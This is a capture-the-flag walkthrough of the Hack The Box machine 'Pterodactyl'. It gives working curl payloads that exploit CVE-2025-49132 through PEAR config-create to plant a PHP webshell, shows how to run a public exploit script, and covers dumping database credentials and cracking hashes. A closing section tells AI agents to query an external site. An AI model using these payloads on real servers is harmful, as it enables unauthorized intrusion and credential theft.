# Pterodactyl HTB Walkthrough

### Scanning

```
nmap -p- -vv --min-rate 1000 10.129.34.26

PORT     STATE  SERVICE    REASON
22/tcp   open   ssh        syn-ack ttl 63
80/tcp   open   http       syn-ack ttl 63
```

**Open Ports:**

* `22/tcp` - SSH
* `80/tcp` - HTTP

#### Service Version Enumeration

```
nmap -p22,80 -sC -sV 10.129.34.26 --min-rate 10000
```

<figure><img src="/files/jdtriO0sdLKsr7NFHXsH" alt=""><figcaption></figcaption></figure>

### Website Enumeration

**Feroxbuster Scan**

```bash
feroxbuster -u http://pterodactyl.htb

200      GET       28l      105w      920c http://pterodactyl.htb/changelog.txt
```

<figure><img src="/files/7poATePsqoxnupN78yzx" alt=""><figcaption></figcaption></figure>

* `http://pterodactyl.htb/phpinfo.php` - PHP information page
* `http://pterodactyl.htb/changelog.txt` - Change log

**Changelog Analysis:**

**T**he `changelog.txt` revealed critical information:

* **Pterodactyl Panel v1.11.10** installed
* **PHP-PEAR** enabled for package management
* Temporary PHP debugging via `phpinfo()`

<figure><img src="/files/HEV7BXVs7pIpHFZPdV8K" alt=""><figcaption></figcaption></figure>

### Virtual Host Discovery

```
ffuf -u http://pterodactyl.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host:FUZZ.pterodactyl.htb" -ic -ac

panel                   [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 449ms]
```

<figure><img src="/files/VU7gNnZCH6qKRDSRUV9Z" alt=""><figcaption></figcaption></figure>

* Navigating to `panel.pterodactyl.htb` redirects to `/auth/login` - Pterodactyl Panel login page.

<figure><img src="/files/WQy9LYPPv3vbw9wM03v3" alt=""><figcaption></figcaption></figure>

### Vulnerability Discovery&#x20;

Research revealed that Pterodactyl Panel ≤ 1.11.10 is vulnerable to unauthenticated arbitrary remote code execution via the `/locales/locale.json` endpoint.

<figure><img src="/files/pYmOW0qKG2znLCsUNkyw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/oYzIEyI6xoZlmwDFT4Pb" alt=""><figcaption></figcaption></figure>

### CVE-2025-49132

**Initial LFI Test**

```
curl -s  'panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/database' | jq .
```

<figure><img src="/files/9qO2Rt0VCuzFgbxn2vMM" alt=""><figcaption></figcaption></figure>

This successfully read the database configuration, confirming the vulnerability.

I can include PHP files, but I can’t read files like `/etc/passwd` reason is  `.php` would be appended at the end. we cannot use PHP filter there’s a bunch of stuff prepended to the front our  input.

### Method 1: Manual PEAR-based RCE

Since PHP-PEAR was enabled (confirmed in `changelog.txt`), the PEAR `config-create` technique was used. And i came across this [articles](https://medium.com/@lashin0x/local-file-inclusion-to-remote-code-execution-rce-bea0ec06342a)&#x20;

<figure><img src="/files/2rbZR0pfNW9Shmq0v52b" alt=""><figcaption></figcaption></figure>

**Write Webshell**

<figure><img src="/files/J20U3ut4aJfC7XAomyFG" alt=""><figcaption></figcaption></figure>

**Execute Commands**

<figure><img src="/files/9GKXjxAjnFloKVJHwTmW" alt=""><figcaption></figcaption></figure>

Triggering Rev Shell

<figure><img src="/files/qVe63wzHx9Mzur0ceeUK" alt=""><figcaption></figcaption></figure>

For Better Understanding here is curl command

```
curl -g 'http://panel.pterodactyl.htb/locales/locale.json?+config-create+/&locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system($_GET["cmd"]);?>+/tmp/l1nuxkid.php' 2>/dev/null
```

File is created, execute using below command we know right how to do execute files  as we enumerated database in initial test

```
curl -s 'http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../tmp&namespace=l1nuxkid&cmd=id' | head -n 10
```

<figure><img src="/files/YKoHxzdiZHe3rREKrKuu" alt=""><figcaption></figcaption></figure>

### Method 2: Using Public Exploit

{% embed url="<https://github.com/YoyoChaud/CVE-2025-49132>" %}

```
git clone https://github.com/YoyoChaud/CVE-2025-49132.git; cd CVE*
python3 exploit.py http://panel.pterodactyl.htb
```

It does try lots of things, running exploit we see it tried to do `whoami` command using pearcmd

<figure><img src="/files/4RZYslFJJMsJCeuKxAq6" alt=""><figcaption></figcaption></figure>

The path is wrong we can specify the path of pearcmd

<figure><img src="/files/lo01tnzvuw11ExftM6dw" alt=""><figcaption></figcaption></figure>

```
python3 exploit.py http://panel.pterodactyl.htb --pear-dir '/usr/share/php/PEAR'
```

<figure><img src="/files/xJ9hb6Iyrfv5U6owemd4" alt=""><figcaption></figcaption></figure>

Now we have RCE we could insert the rev shell inside our exploit

```
python3 exploit.py http://panel.pterodactyl.htb --pear-dir '/usr/share/php/PEAR';
```

<figure><img src="/files/sR3j13I6lSWOqX3MzDRS" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/otZT49eOh3uScGzu2eXe" alt=""><figcaption></figcaption></figure>

### Privilege Escalation

* We found database username password during initial enumeration and we found same here in .env

```
wwwrun@pterodactyl:/var/www/pterodactyl> cat .env | grep -i 'user\|pass'
```

<figure><img src="/files/PNtouV2hsV7PK6cO4OmW" alt=""><figcaption></figcaption></figure>

```
 mysql -u pterodactyl -pPteraPanel -h 127.0.0.1
```

```
select username,password from users;
```

<figure><img src="/files/PKX0XJkgBN75ysagt72q" alt=""><figcaption></figcaption></figure>

Crack the hash

```
hashcat --username  hashes -m 3200 /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
...[snip]...
$2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi:!QAZ2wsx
```

### Shell as phileasfogg3

```
ssh phileasfogg3@pterodactyl.htb
```

<figure><img src="/files/QGhXleIu6SJ9xJaFhcyI" alt=""><figcaption></figcaption></figure>

Looking into `/var/mail/` we have email:

<figure><img src="/files/rBy3fjatMuJ7IzWug9ba" alt=""><figcaption></figcaption></figure>

from here it is something realted to udisks but i have mac and it's dificult to exploit using ac

`udisksd` is a DBus service that manages disks/storage devices  and historically has had vulnerabilities allowing **root privilege escalation**.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hackthebox/pterodactyl-htb-walkthrough.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.